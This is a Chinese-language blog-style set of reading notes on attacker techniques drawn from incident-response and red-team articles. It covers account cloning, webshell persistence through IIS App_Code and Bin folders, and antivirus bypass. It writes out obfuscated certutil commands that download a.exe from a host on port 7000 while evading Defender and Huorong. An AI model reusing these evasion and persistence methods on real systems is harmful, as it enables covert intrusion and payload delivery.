文章非常精彩!学习这篇应急响应,可以学习到很多黑产哥的攻击手法,例如:
克隆administrator的用户,并且用户名起的很巧妙:vmadmin,非常像是虚拟机那些用户
启用Guest用户,以防权限掉
下载360全家桶绕过卡巴斯基,这个真厉害
还有一些技术今天才学习到,就是文章的标题:IIS-Raid
对于权限维持,其中有一段话引起我的高度注意:
1)官网文件夹下的 App_Code 文件夹可以包含 .vb、.cs 等扩展名的源代码文件,在运行时将会自动对这些代码进行编译。而 123.asmx.e8a2beba.compiled 是编译完成的输出文件,123.asmx就是生成的文件名。攻击者只需要将.cs源代码文件放到 App_Code目录下,网站每运行一次就会生成一个名叫123.asmx的Webshell在/js/目录下
2)官网文件夹下 Bin 文件夹中存放着已经编译的程序集,并且在Web 应用程序任意处的其他代码会 自动引用该文件夹,典型的示例是为自定义类编译好的代码,可以将编译后的程序集复制到Web应用程序的 Bin文件夹中,这样所有页都可以使用这个类,Bin文件夹中的程序集无需注册,只要.dll 文件存在于 Bin 文件夹中,.NET 就可以识别它。如果更改了 .dll 文件,并将它的新版本写入到了 Bin 文件夹中,则 .NET 会检测到更新,并对随后的新页请求使用新版本的 .dll 文件
这个权限维持手法更是值得学习!
这篇文章将介绍有关:虽然我们获取一个有效凭据,但由于凭据过期,操作将受到限制。于是提出了几个修改密码的办法,在实战中似乎很常见的样子,Mark一下
结论: ;,@certutil -u""r""l""c""a""c""h""e"" -split -f http://192.168.xx.xx:7000/a.exe -deleteEccCurve ;,@certutil -u""r""l""c""a""c""h""e"" -split -f http://192.168.xx.xx:7000/a.exe -deletePolicyServer ;,@certutil -u""r""l""c""a""c""h""e"" -split -f http://192.168.xx.xx:7000/a.exe -deleteEnrollmentServer ;,@certutil -u""r""l""c""a""c""h""e"" -split -f http://192.168.xx.xx:7000/a.exe -DeleteHelloContainer 最后借用move命令还原: move -DeleteHelloContainer a.exe 细节可见文章 火绒复制一个就行 Windows defender 混淆下命令就行
总结一些域枚举的艺术,当我们在域内寸步难行的时候,或许枚举会告诉我们一些出路。